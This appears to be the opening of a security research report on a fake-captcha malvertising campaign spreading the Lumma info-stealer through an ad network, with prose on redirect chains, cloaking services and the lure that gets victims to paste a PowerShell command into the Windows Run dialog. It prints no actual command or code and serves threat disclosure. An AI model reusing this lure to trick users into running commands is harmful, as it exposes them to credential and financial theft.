Guardio Labs tracked and analyzed a large-scale fake captcha campaign distributing a disastrous Lumma info-stealer malware that circumvents general security measures like Safe Browsing. Entirely reliant on a single ad network for propagation, this campaign showcases the core mechanisms of malvertising — delivering over 1 million daily “ad impressions” and causing thousands of daily victims to lose their accounts and money through a network of 3,000+ content sites funneling traffic. Our research dissects this campaign and provides insights into the malvertising industry’s infrastructure, tactics, and key players.
Through a detailed analysis of redirect chains, obfuscated scripts, and Traffic Distribution Systems (TDS) — in collaboration with our friends at Infoblox — we traced the campaign’s origins to Monetag, a part of ProepllerAds’ network previously tracked by Infoblox under the name “Vane Viper.” Further investigation reveals how threat actors leveraged services like BeMob ad-tracking to cloak their malicious intent, showcasing the fragmented accountability in the ad ecosystem. This lack of oversight leaves internet users vulnerable and enables malvertising campaigns to flourish at scale.
For several weeks, a large-scale deceptive campaign has leveraged a cunning technique: tricking users into installing dangerous stealer malware via a captcha verification page. This seemingly legitimate captcha page appears unexpectedly as you browse a content site, perfectly mimicking a real verification process. It asks you to confirm you’re human through a series of keyboard clicks, which ultimately trigger the Run dialog on your Windows system. Unknowingly, you paste and execute a cleverly crafted PowerShell command, instantly installing stealer malware that targets your social accounts, banking credentials, passwords, and personal files. Vicious, effective, and dangerously evasive!